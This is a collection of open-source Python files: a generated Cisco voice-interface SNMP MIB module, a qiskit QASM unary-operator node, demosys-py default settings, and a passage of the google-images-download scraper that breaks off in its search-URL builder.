xiangke/pycopia | mibs/pycopia/mibs/CISCO_VOICE_IF_MIB.py | 1 | 6172 | # python
# This file is generated by a program (mib2py). Any edits will be lost.
from pycopia.aid import Enum
import pycopia.SMI.Basetypes
Range = pycopia.SMI.Basetypes.Range
Ranges = pycopia.SMI.Basetypes.Ranges
from pycopia.SMI.Objects import ColumnObject, MacroObject, NotificationObject, RowObject, ScalarObject, NodeObject, ModuleObject, GroupObject
# imports
from SNMPv2_CONF import MODULE_COMPLIANCE, OBJECT_GROUP
from IF_MIB import ifIndex
from SNMPv2_SMI import MODULE_IDENTITY, OBJECT_TYPE, Integer32
from CISCO_TC import CountryCode
from CISCO_SMI import ciscoMgmt
from SNMPv2_TC import TruthValue, DisplayString
class CISCO_VOICE_IF_MIB(ModuleObject):
path = '/usr/share/snmp/mibs/site/CISCO-VOICE-IF-MIB'
conformance = 3
name = 'CISCO-VOICE-IF-MIB'
language = 2
description = 'Common Voice Interface MIB module.\nThe MIB module manages the common voice related parameters\nfor both voice analog and ISDN interfaces.'
# nodes
class ciscoVoiceInterfaceMIB(NodeObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64])
name = 'ciscoVoiceInterfaceMIB'
class cvIfObjects(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1])
name = 'cvIfObjects'
class cvIfCfgObjects(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1])
name = 'cvIfCfgObjects'
class cvIfConformance(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 2])
name = 'cvIfConformance'
class cvIfCompliances(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 2, 1])
name = 'cvIfCompliances'
class cvIfGroups(NodeObject):
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 2, 2])
name = 'cvIfGroups'
# macros
# types
# scalars
# columns
class cvIfCfgNoiseRegEnable(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 1])
syntaxobject = pycopia.SMI.Basetypes.TruthValue
class cvIfCfgNonLinearProcEnable(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 2])
syntaxobject = pycopia.SMI.Basetypes.TruthValue
class cvIfCfgMusicOnHoldThreshold(ColumnObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 3])
syntaxobject = pycopia.SMI.Basetypes.Integer32
access = 5
units = 'dBm'
class cvIfCfgInGain(ColumnObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 4])
syntaxobject = pycopia.SMI.Basetypes.Integer32
access = 5
units = 'dB'
class cvIfCfgOutAttn(ColumnObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 5])
syntaxobject = pycopia.SMI.Basetypes.Integer32
access = 5
units = 'dB'
class cvIfCfgEchoCancelEnable(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 6])
syntaxobject = pycopia.SMI.Basetypes.TruthValue
class cvIfCfgEchoCancelCoverage(ColumnObject):
status = 1
access = 5
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 7])
syntaxobject = pycopia.SMI.Basetypes.Enumeration
enumerations = [Enum(1, 'echoCanceller16ms'), Enum(2, 'echoCanceller24ms'), Enum(3, 'echoCanceller32ms')]
class cvIfCfgConnectionMode(ColumnObject):
status = 1
access = 5
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 8])
syntaxobject = pycopia.SMI.Basetypes.Enumeration
enumerations = [Enum(1, 'normal'), Enum(2, 'trunk'), Enum(3, 'plar')]
class cvIfCfgConnectionNumber(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 9])
syntaxobject = pycopia.SMI.Basetypes.DisplayString
class cvIfCfgInitialDigitTimeOut(ColumnObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 10])
syntaxobject = pycopia.SMI.Basetypes.Integer32
access = 5
units = 'seconds'
class cvIfCfgInterDigitTimeOut(ColumnObject):
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 11])
syntaxobject = pycopia.SMI.Basetypes.Integer32
access = 5
units = 'seconds'
class cvIfCfgRegionalTone(ColumnObject):
access = 5
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1, 12])
syntaxobject = CountryCode
# rows
class cvIfCfgEntry(RowObject):
status = 1
index = pycopia.SMI.Objects.IndexObjects([ifIndex], False)
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 1, 1, 1, 1])
access = 2
columns = {'cvIfCfgNoiseRegEnable': cvIfCfgNoiseRegEnable, 'cvIfCfgNonLinearProcEnable': cvIfCfgNonLinearProcEnable, 'cvIfCfgMusicOnHoldThreshold': cvIfCfgMusicOnHoldThreshold, 'cvIfCfgInGain': cvIfCfgInGain, 'cvIfCfgOutAttn': cvIfCfgOutAttn, 'cvIfCfgEchoCancelEnable': cvIfCfgEchoCancelEnable, 'cvIfCfgEchoCancelCoverage': cvIfCfgEchoCancelCoverage, 'cvIfCfgConnectionMode': cvIfCfgConnectionMode, 'cvIfCfgConnectionNumber': cvIfCfgConnectionNumber, 'cvIfCfgInitialDigitTimeOut': cvIfCfgInitialDigitTimeOut, 'cvIfCfgInterDigitTimeOut': cvIfCfgInterDigitTimeOut, 'cvIfCfgRegionalTone': cvIfCfgRegionalTone}
# notifications (traps)
# groups
class cvIfGroup(GroupObject):
access = 2
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 2, 2, 1])
group = [cvIfCfgNoiseRegEnable, cvIfCfgNonLinearProcEnable, cvIfCfgMusicOnHoldThreshold, cvIfCfgInGain, cvIfCfgOutAttn, cvIfCfgEchoCancelEnable, cvIfCfgEchoCancelCoverage, cvIfCfgInitialDigitTimeOut, cvIfCfgInterDigitTimeOut, cvIfCfgRegionalTone]
class cvIfConnectionGroup(GroupObject):
access = 2
status = 1
OID = pycopia.SMI.Basetypes.ObjectIdentifier([1, 3, 6, 1, 4, 1, 9, 9, 64, 2, 2, 2])
group = [cvIfCfgConnectionMode, cvIfCfgConnectionNumber]
# capabilities
# special additions
# Add to master OIDMAP.
from pycopia import SMI
SMI.update_oidmap(__name__)
| lgpl-2.1 | -397,005,942,782,059,600 | 33.870056 | 607 | 0.733798 | false |
atilag/qiskit-sdk-py | qiskit/qasm/_node/_unaryoperator.py | 1 | 1662 | # -*- coding: utf-8 -*-
# Copyright 2017 IBM RESEARCH. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
"""
Node for an OPENQASM unary operator.
"""
import operator
from ._node import Node
from ._nodeexception import NodeException
VALID_OPERATORS = {
'+': operator.pos,
'-': operator.neg,
}
class UnaryOperator(Node):
"""Node for an OPENQASM unary operator.
This node has no children. The data is in the value field.
"""
def __init__(self, operation):
"""Create the operator node."""
Node.__init__(self, 'unary_operator', None, None)
self.value = operation
def operation(self):
"""
        Return the operator as a unary function f(operand).
"""
try:
return VALID_OPERATORS[self.value]
except KeyError:
raise NodeException("internal error: undefined prefix '%s'" %
self.value)
def qasm(self, prec=15):
"""Return QASM representation."""
# pylint: disable=unused-argument
return self.value
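# Illustrative usage (a hedged sketch added as a comment; not part of the
# original module): a unary minus node resolves to operator.neg.
#
#     op = UnaryOperator('-')
#     fn = op.operation()       # operator.neg
#     assert fn(5) == -5
#     assert op.qasm() == '-'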
| apache-2.0 | 6,572,356,457,025,158,000 | 28.678571 | 79 | 0.619134 | false |
Contraz/demosys-py | demosys/conf/default.py | 1 | 1803 | import os
PROJECT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
SCREENSHOT_PATH = os.path.join(PROJECT_DIR, 'screenshots')
# OpenGL context configuration
# version: (MAJOR, MINOR)
OPENGL = {
"version": (3, 3),
}
# Window / context properties
WINDOW = {
"class": "demosys.context.pyqt.GLFW_Window",
"size": (1280, 720),
"aspect_ratio": 16 / 9,
"fullscreen": False,
"resizable": True,
"title": "demosys-py",
"vsync": True,
"cursor": True,
"samples": 0,
}
MUSIC = None
TIMER = 'demosys.timers.clock.Timer'
TIMELINE = 'demosys.timeline.single.Timeline'
ROCKET = {
'mode': 'editor',
'rps': 24,
'project': None,
'files': None,
}
PROGRAM_DIRS = (
)
PROGRAM_FINDERS = (
"demosys.finders.program.FileSystemFinder",
"demosys.finders.program.EffectDirectoriesFinder",
)
PROGRAM_LOADERS = (
'demosys.loaders.program.single.Loader',
'demosys.loaders.program.separate.Loader',
)
TEXTURE_DIRS = (
)
TEXTURE_FINDERS = (
"demosys.finders.textures.FileSystemFinder",
"demosys.finders.textures.EffectDirectoriesFinder",
)
TEXTURE_LOADERS = (
'demosys.loaders.texture.t2d.Loader',
'demosys.loaders.texture.array.Loader',
)
SCENE_DIRS = (
)
SCENE_FINDERS = (
"demosys.finders.scenes.FileSystemFinder",
"demosys.finders.scenes.EffectDirectoriesFinder",
)
SCENE_LOADERS = (
"demosys.loaders.scene.gltf.GLTF2",
"demosys.loaders.scene.wavefront.ObjLoader",
"demosys.loaders.scene.stl_loader.STLLoader",
)
DATA_DIRS = ()
DATA_FINDERS = (
"demosys.finders.data.FileSystemFinder",
"demosys.finders.data.EffectDirectoriesFinder",
)
DATA_LOADERS = (
'demosys.loaders.data.binary.Loader',
'demosys.loaders.data.text.Loader',
'demosys.loaders.data.json.Loader',
)
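# Illustrative usage (a hedged sketch added as a comment; the import path of
# the settings accessor is an assumption, not shown in this file):
#
#     from demosys.conf import settings
#     width, height = settings.WINDOW['size']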
| isc | 2,767,333,997,683,368,400 | 18.387097 | 73 | 0.672213 | false |
hardikvasa/google-images-download | google_images_download/google_images_download.py | 1 | 52513 | #!/usr/bin/env python
# coding: utf-8
###### Searching and Downloading Google Images to the local disk ######
# Import Libraries
import sys
version = (3, 0)
cur_version = sys.version_info
if cur_version >= version: # If the Current Version of Python is 3.0 or above
import urllib.request
from urllib.request import Request, urlopen
from urllib.request import URLError, HTTPError
from urllib.parse import quote
import http.client
from http.client import IncompleteRead, BadStatusLine
http.client._MAXHEADERS = 1000
else: # If the Current Version of Python is 2.x
import urllib2
from urllib2 import Request, urlopen
from urllib2 import URLError, HTTPError
from urllib import quote
import httplib
from httplib import IncompleteRead, BadStatusLine
httplib._MAXHEADERS = 1000
import time # Importing the time library to check the time of code execution
import os
import argparse
import ssl
import datetime
import json
import re
import codecs
import socket
args_list = ["keywords", "keywords_from_file", "prefix_keywords", "suffix_keywords",
"limit", "format", "color", "color_type", "usage_rights", "size",
"exact_size", "aspect_ratio", "type", "time", "time_range", "delay", "url", "single_image",
"output_directory", "image_directory", "no_directory", "proxy", "similar_images", "specific_site",
"print_urls", "print_size", "print_paths", "metadata", "extract_metadata", "socket_timeout",
"thumbnail", "thumbnail_only", "language", "prefix", "chromedriver", "related_images", "safe_search", "no_numbering",
"offset", "no_download","save_source","silent_mode","ignore_urls"]
def user_input():
config = argparse.ArgumentParser()
config.add_argument('-cf', '--config_file', help='config file name', default='', type=str, required=False)
config_file_check = config.parse_known_args()
object_check = vars(config_file_check[0])
if object_check['config_file'] != '':
records = []
json_file = json.load(open(config_file_check[0].config_file))
for record in range(0,len(json_file['Records'])):
arguments = {}
for i in args_list:
arguments[i] = None
for key, value in json_file['Records'][record].items():
arguments[key] = value
records.append(arguments)
records_count = len(records)
else:
# Taking command line arguments from users
parser = argparse.ArgumentParser()
parser.add_argument('-k', '--keywords', help='delimited list input', type=str, required=False)
parser.add_argument('-kf', '--keywords_from_file', help='extract list of keywords from a text file', type=str, required=False)
parser.add_argument('-sk', '--suffix_keywords', help='comma separated additional words added after to main keyword', type=str, required=False)
parser.add_argument('-pk', '--prefix_keywords', help='comma separated additional words added before main keyword', type=str, required=False)
parser.add_argument('-l', '--limit', help='delimited list input', type=str, required=False)
parser.add_argument('-f', '--format', help='download images with specific format', type=str, required=False,
choices=['jpg', 'gif', 'png', 'bmp', 'svg', 'webp', 'ico'])
parser.add_argument('-u', '--url', help='search with google image URL', type=str, required=False)
parser.add_argument('-x', '--single_image', help='downloading a single image from URL', type=str, required=False)
parser.add_argument('-o', '--output_directory', help='download images in a specific main directory', type=str, required=False)
parser.add_argument('-i', '--image_directory', help='download images in a specific sub-directory', type=str, required=False)
parser.add_argument('-n', '--no_directory', default=False, help='download images in the main directory but no sub-directory', action="store_true")
parser.add_argument('-d', '--delay', help='delay in seconds to wait between downloading two images', type=int, required=False)
parser.add_argument('-co', '--color', help='filter on color', type=str, required=False,
choices=['red', 'orange', 'yellow', 'green', 'teal', 'blue', 'purple', 'pink', 'white', 'gray', 'black', 'brown'])
parser.add_argument('-ct', '--color_type', help='filter on color', type=str, required=False,
choices=['full-color', 'black-and-white', 'transparent'])
parser.add_argument('-r', '--usage_rights', help='usage rights', type=str, required=False,
choices=['labeled-for-reuse-with-modifications','labeled-for-reuse','labeled-for-noncommercial-reuse-with-modification','labeled-for-nocommercial-reuse'])
parser.add_argument('-s', '--size', help='image size', type=str, required=False,
choices=['large','medium','icon','>400*300','>640*480','>800*600','>1024*768','>2MP','>4MP','>6MP','>8MP','>10MP','>12MP','>15MP','>20MP','>40MP','>70MP'])
parser.add_argument('-es', '--exact_size', help='exact image resolution "WIDTH,HEIGHT"', type=str, required=False)
parser.add_argument('-t', '--type', help='image type', type=str, required=False,
choices=['face','photo','clipart','line-drawing','animated'])
parser.add_argument('-w', '--time', help='image age', type=str, required=False,
choices=['past-24-hours','past-7-days','past-month','past-year'])
parser.add_argument('-wr', '--time_range', help='time range for the age of the image. should be in the format {"time_min":"MM/DD/YYYY","time_max":"MM/DD/YYYY"}', type=str, required=False)
parser.add_argument('-a', '--aspect_ratio', help='comma separated additional words added to keywords', type=str, required=False,
choices=['tall', 'square', 'wide', 'panoramic'])
parser.add_argument('-si', '--similar_images', help='downloads images very similar to the image URL you provide', type=str, required=False)
parser.add_argument('-ss', '--specific_site', help='downloads images that are indexed from a specific website', type=str, required=False)
parser.add_argument('-p', '--print_urls', default=False, help="Print the URLs of the images", action="store_true")
parser.add_argument('-ps', '--print_size', default=False, help="Print the size of the images on disk", action="store_true")
parser.add_argument('-pp', '--print_paths', default=False, help="Prints the list of absolute paths of the images",action="store_true")
parser.add_argument('-m', '--metadata', default=False, help="Print the metadata of the image", action="store_true")
parser.add_argument('-e', '--extract_metadata', default=False, help="Dumps all the logs into a text file", action="store_true")
parser.add_argument('-st', '--socket_timeout', default=False, help="Connection timeout waiting for the image to download", type=float)
parser.add_argument('-th', '--thumbnail', default=False, help="Downloads image thumbnail along with the actual image", action="store_true")
parser.add_argument('-tho', '--thumbnail_only', default=False, help="Downloads only thumbnail without downloading actual images", action="store_true")
parser.add_argument('-la', '--language', default=False, help="Defines the language filter. The search results are authomatically returned in that language", type=str, required=False,
choices=['Arabic','Chinese (Simplified)','Chinese (Traditional)','Czech','Danish','Dutch','English','Estonian','Finnish','French','German','Greek','Hebrew','Hungarian','Icelandic','Italian','Japanese','Korean','Latvian','Lithuanian','Norwegian','Portuguese','Polish','Romanian','Russian','Spanish','Swedish','Turkish'])
parser.add_argument('-pr', '--prefix', default=False, help="A word that you would want to prefix in front of each image name", type=str, required=False)
parser.add_argument('-px', '--proxy', help='specify a proxy address and port', type=str, required=False)
parser.add_argument('-cd', '--chromedriver', help='specify the path to chromedriver executable in your local machine', type=str, required=False)
parser.add_argument('-ri', '--related_images', default=False, help="Downloads images that are similar to the keyword provided", action="store_true")
parser.add_argument('-sa', '--safe_search', default=False, help="Turns on the safe search filter while searching for images", action="store_true")
parser.add_argument('-nn', '--no_numbering', default=False, help="Allows you to exclude the default numbering of images", action="store_true")
parser.add_argument('-of', '--offset', help="Where to start in the fetched links", type=str, required=False)
parser.add_argument('-nd', '--no_download', default=False, help="Prints the URLs of the images and/or thumbnails without downloading them", action="store_true")
parser.add_argument('-iu', '--ignore_urls', default=False, help="delimited list input of image urls/keywords to ignore", type=str)
parser.add_argument('-sil', '--silent_mode', default=False, help="Remains silent. Does not print notification messages on the terminal", action="store_true")
parser.add_argument('-is', '--save_source', help="creates a text file containing a list of downloaded images along with source page url", type=str, required=False)
args = parser.parse_args()
arguments = vars(args)
records = []
records.append(arguments)
return records
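# Illustrative config file layout (a hedged sketch added as a comment): the
# JSON read above is expected to look like
#     {"Records": [{"keywords": "polar bears", "limit": 5}]}
# where each record may set any of the argument names listed in args_list.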
class googleimagesdownload:
def __init__(self):
pass
# Downloading entire Web Document (Raw Page Content)
def download_page(self,url):
version = (3, 0)
cur_version = sys.version_info
if cur_version >= version: # If the Current Version of Python is 3.0 or above
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
req = urllib.request.Request(url, headers=headers)
resp = urllib.request.urlopen(req)
respData = str(resp.read())
return respData
except Exception as e:
                print("Could not open URL. Please check your internet connection and/or ssl settings \n"
                      "If you are using a proxy, make sure your proxy settings are configured correctly")
sys.exit()
else: # If the Current Version of Python is 2.x
try:
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req = urllib2.Request(url, headers=headers)
try:
response = urllib2.urlopen(req)
except URLError: # Handling SSL certificate failed
context = ssl._create_unverified_context()
response = urlopen(req, context=context)
page = response.read()
return page
except:
                print("Could not open URL. Please check your internet connection and/or ssl settings \n"
                      "If you are using a proxy, make sure your proxy settings are configured correctly")
sys.exit()
return "Page Not found"
# Download Page for more than 100 images
def download_extended_page(self,url,chromedriver):
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
if sys.version_info[0] < 3:
reload(sys)
sys.setdefaultencoding('utf8')
options = webdriver.ChromeOptions()
options.add_argument('--no-sandbox')
options.add_argument("--headless")
try:
browser = webdriver.Chrome(chromedriver, chrome_options=options)
except Exception as e:
            print("Looks like we cannot locate the path to 'chromedriver' (use the '--chromedriver' "
                  "argument to specify the path to the executable) or the google chrome browser is not "
                  "installed on your machine (exception: %s)" % e)
sys.exit()
browser.set_window_size(1024, 768)
# Open the link
browser.get(url)
time.sleep(1)
print("Getting you a lot of images. This may take a few moments...")
element = browser.find_element_by_tag_name("body")
# Scroll down
for i in range(30):
element.send_keys(Keys.PAGE_DOWN)
time.sleep(0.3)
try:
browser.find_element_by_id("smb").click()
for i in range(50):
element.send_keys(Keys.PAGE_DOWN)
time.sleep(0.3) # bot id protection
except:
for i in range(10):
element.send_keys(Keys.PAGE_DOWN)
time.sleep(0.3) # bot id protection
print("Reached end of Page.")
time.sleep(0.5)
source = browser.page_source #page source
#close the browser
browser.close()
return source
#Correcting the escape characters for python2
def replace_with_byte(self,match):
return chr(int(match.group(0)[1:], 8))
def repair(self,brokenjson):
invalid_escape = re.compile(r'\\[0-7]{1,3}') # up to 3 digits for byte values up to FF
return invalid_escape.sub(self.replace_with_byte, brokenjson)
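    # Illustrative example (a hedged sketch added as a comment): repair()
    # rewrites octal escapes that break json.loads under Python 2, e.g.
    #     self.repair("it\\47s")   # -> "it's"   (chr(0o47) == "'")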
# Finding 'Next Image' from the given raw page
def get_next_tab(self,s):
start_line = s.find('class="dtviD"')
if start_line == -1: # If no links are found then give an error!
end_quote = 0
link = "no_tabs"
return link,'',end_quote
else:
start_line = s.find('class="dtviD"')
start_content = s.find('href="', start_line + 1)
end_content = s.find('">', start_content + 1)
url_item = "https://www.google.com" + str(s[start_content + 6:end_content])
url_item = url_item.replace('&', '&')
start_line_2 = s.find('class="dtviD"')
s = s.replace('&', '&')
start_content_2 = s.find(':', start_line_2 + 1)
end_content_2 = s.find('&usg=', start_content_2 + 1)
url_item_name = str(s[start_content_2 + 1:end_content_2])
chars = url_item_name.find(',g_1:')
chars_end = url_item_name.find(":", chars + 6)
if chars_end == -1:
updated_item_name = (url_item_name[chars + 5:]).replace("+", " ")
else:
updated_item_name = (url_item_name[chars+5:chars_end]).replace("+", " ")
return url_item, updated_item_name, end_content
# Getting all links with the help of '_images_get_next_image'
def get_all_tabs(self,page):
tabs = {}
while True:
item,item_name,end_content = self.get_next_tab(page)
if item == "no_tabs":
break
else:
if len(item_name) > 100 or item_name == "background-color":
break
else:
tabs[item_name] = item # Append all the links in the list named 'Links'
time.sleep(0.1) # Timer could be used to slow down the request for image downloads
page = page[end_content:]
return tabs
#Format the object in readable format
def format_object(self,object):
formatted_object = {}
formatted_object['image_format'] = object['ity']
formatted_object['image_height'] = object['oh']
formatted_object['image_width'] = object['ow']
formatted_object['image_link'] = object['ou']
formatted_object['image_description'] = object['pt']
formatted_object['image_host'] = object['rh']
formatted_object['image_source'] = object['ru']
formatted_object['image_thumbnail_url'] = object['tu']
return formatted_object
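    # Illustrative input (a hedged note added as a comment): the raw objects
    # parsed out of Google's markup use short keys such as
    #     {'ity': 'jpg', 'oh': 768, 'ow': 1024, 'ou': <image URL>, 'tu': <thumbnail URL>, ...}
    # and format_object renames them to the readable keys used above.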
#function to download single image
def single_image(self,image_url):
main_directory = "downloads"
extensions = (".jpg", ".gif", ".png", ".bmp", ".svg", ".webp", ".ico")
url = image_url
try:
os.makedirs(main_directory)
except OSError as e:
if e.errno != 17:
raise
pass
req = Request(url, headers={
"User-Agent": "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"})
response = urlopen(req, None, 10)
data = response.read()
response.close()
image_name = str(url[(url.rfind('/')) + 1:])
if '?' in image_name:
image_name = image_name[:image_name.find('?')]
# if ".jpg" in image_name or ".gif" in image_name or ".png" in image_name or ".bmp" in image_name or ".svg" in image_name or ".webp" in image_name or ".ico" in image_name:
if any(map(lambda extension: extension in image_name, extensions)):
file_name = main_directory + "/" + image_name
else:
file_name = main_directory + "/" + image_name + ".jpg"
image_name = image_name + ".jpg"
try:
output_file = open(file_name, 'wb')
output_file.write(data)
output_file.close()
except IOError as e:
raise e
except OSError as e:
raise e
print("completed ====> " + image_name.encode('raw_unicode_escape').decode('utf-8'))
return
def similar_images(self,similar_images):
version = (3, 0)
cur_version = sys.version_info
if cur_version >= version: # If the Current Version of Python is 3.0 or above
try:
searchUrl = 'https://www.google.com/searchbyimage?site=search&sa=X&image_url=' + similar_images
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
req1 = urllib.request.Request(searchUrl, headers=headers)
resp1 = urllib.request.urlopen(req1)
content = str(resp1.read())
l1 = content.find('AMhZZ')
l2 = content.find('&', l1)
urll = content[l1:l2]
newurl = "https://www.google.com/search?tbs=sbi:" + urll + "&site=search&sa=X"
req2 = urllib.request.Request(newurl, headers=headers)
resp2 = urllib.request.urlopen(req2)
l3 = content.find('/search?sa=X&q=')
l4 = content.find(';', l3 + 19)
urll2 = content[l3 + 19:l4]
return urll2
except:
                return "Could not connect to Google Images endpoint"
else: # If the Current Version of Python is 2.x
try:
searchUrl = 'https://www.google.com/searchbyimage?site=search&sa=X&image_url=' + similar_images
headers = {}
headers['User-Agent'] = "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.27 Safari/537.17"
req1 = urllib2.Request(searchUrl, headers=headers)
resp1 = urllib2.urlopen(req1)
content = str(resp1.read())
l1 = content.find('AMhZZ')
l2 = content.find('&', l1)
urll = content[l1:l2]
newurl = "https://www.google.com/search?tbs=sbi:" + urll + "&site=search&sa=X"
req2 = urllib2.Request(newurl, headers=headers)
resp2 = urllib2.urlopen(req2)
l3 = content.find('/search?sa=X&q=')
l4 = content.find(';', l3 + 19)
urll2 = content[l3 + 19:l4]
return(urll2)
except:
                return "Could not connect to Google Images endpoint"
#Building URL parameters
def build_url_parameters(self,arguments):
if arguments['language']:
lang = "&lr="
lang_param = {"Arabic":"lang_ar","Chinese (Simplified)":"lang_zh-CN","Chinese (Traditional)":"lang_zh-TW","Czech":"lang_cs","Danish":"lang_da","Dutch":"lang_nl","English":"lang_en","Estonian":"lang_et","Finnish":"lang_fi","French":"lang_fr","German":"lang_de","Greek":"lang_el","Hebrew":"lang_iw ","Hungarian":"lang_hu","Icelandic":"lang_is","Italian":"lang_it","Japanese":"lang_ja","Korean":"lang_ko","Latvian":"lang_lv","Lithuanian":"lang_lt","Norwegian":"lang_no","Portuguese":"lang_pt","Polish":"lang_pl","Romanian":"lang_ro","Russian":"lang_ru","Spanish":"lang_es","Swedish":"lang_sv","Turkish":"lang_tr"}
lang_url = lang+lang_param[arguments['language']]
else:
lang_url = ''
if arguments['time_range']:
json_acceptable_string = arguments['time_range'].replace("'", "\"")
d = json.loads(json_acceptable_string)
time_range = ',cdr:1,cd_min:' + d['time_min'] + ',cd_max:' + d['time_max']
else:
time_range = ''
if arguments['exact_size']:
size_array = [x.strip() for x in arguments['exact_size'].split(',')]
exact_size = ",isz:ex,iszw:" + str(size_array[0]) + ",iszh:" + str(size_array[1])
else:
exact_size = ''
built_url = "&tbs="
counter = 0
        params = {'color':[arguments['color'],{'red':'ic:specific,isc:red', 'orange':'ic:specific,isc:orange', 'yellow':'ic:specific,isc:yellow', 'green':'ic:specific,isc:green', 'teal':'ic:specific,isc:teal', 'blue':'ic:specific,isc:blue', 'purple':'ic:specific,isc:purple', 'pink':'ic:specific,isc:pink', 'white':'ic:specific,isc:white', 'gray':'ic:specific,isc:gray', 'black':'ic:specific,isc:black', 'brown':'ic:specific,isc:brown'}],
'color_type':[arguments['color_type'],{'full-color':'ic:color', 'black-and-white':'ic:gray','transparent':'ic:trans'}],
'usage_rights':[arguments['usage_rights'],{'labeled-for-reuse-with-modifications':'sur:fmc','labeled-for-reuse':'sur:fc','labeled-for-noncommercial-reuse-with-modification':'sur:fm','labeled-for-nocommercial-reuse':'sur:f'}],
                  'size':[arguments['size'],{'large':'isz:l','medium':'isz:m','icon':'isz:i','>400*300':'isz:lt,islt:qsvga','>640*480':'isz:lt,islt:vga','>800*600':'isz:lt,islt:svga','>1024*768':'isz:lt,islt:xga','>2MP':'isz:lt,islt:2mp','>4MP':'isz:lt,islt:4mp','>6MP':'isz:lt,islt:6mp','>8MP':'isz:lt,islt:8mp','>10MP':'isz:lt,islt:10mp','>12MP':'isz:lt,islt:12mp','>15MP':'isz:lt,islt:15mp','>20MP':'isz:lt,islt:20mp','>40MP':'isz:lt,islt:40mp','>70MP':'isz:lt,islt:70mp'}],
'type':[arguments['type'],{'face':'itp:face','photo':'itp:photo','clipart':'itp:clipart','line-drawing':'itp:lineart','animated':'itp:animated'}],
'time':[arguments['time'],{'past-24-hours':'qdr:d','past-7-days':'qdr:w','past-month':'qdr:m','past-year':'qdr:y'}],
'aspect_ratio':[arguments['aspect_ratio'],{'tall':'iar:t','square':'iar:s','wide':'iar:w','panoramic':'iar:xw'}],
                  'format':[arguments['format'],{'jpg':'ift:jpg','gif':'ift:gif','png':'ift:png','bmp':'ift:bmp','svg':'ift:svg','webp':'ift:webp','ico':'ift:ico','raw':'ift:craw'}]}
for key, value in params.items():
if value[0] is not None:
ext_param = value[1][value[0]]
# counter will tell if it is first param added or not
if counter == 0:
# add it to the built url
built_url = built_url + ext_param
counter += 1
else:
built_url = built_url + ',' + ext_param
counter += 1
built_url = lang_url+built_url+exact_size+time_range
return built_url
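    # Illustrative example (a hedged sketch added as a comment): with
    # arguments = {'color': 'red', 'format': 'jpg'} and every other filter
    # left as None, the method above returns a string like
    #     &tbs=ic:specific,isc:red,ift:jpg
    # (clause order follows the iteration order of the params dict).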
#building main search URL
def build_search_url(self,search_term,params,url,similar_images,specific_site,safe_search):
#check safe_search
safe_search_string = "&safe=active"
# check the args and choose the URL
if url:
url = url
elif similar_images:
print(similar_images)
keywordem = self.similar_images(similar_images)
url = 'https://www.google.com/search?q=' + keywordem + '&espv=2&biw=1366&bih=667&site=webhp&source=lnms&tbm=isch&sa=X&ei=XosDVaCXD8TasATItgE&ved=0CAcQ_AUoAg'
elif specific_site:
url = 'https://www.google.com/search?q=' + quote(
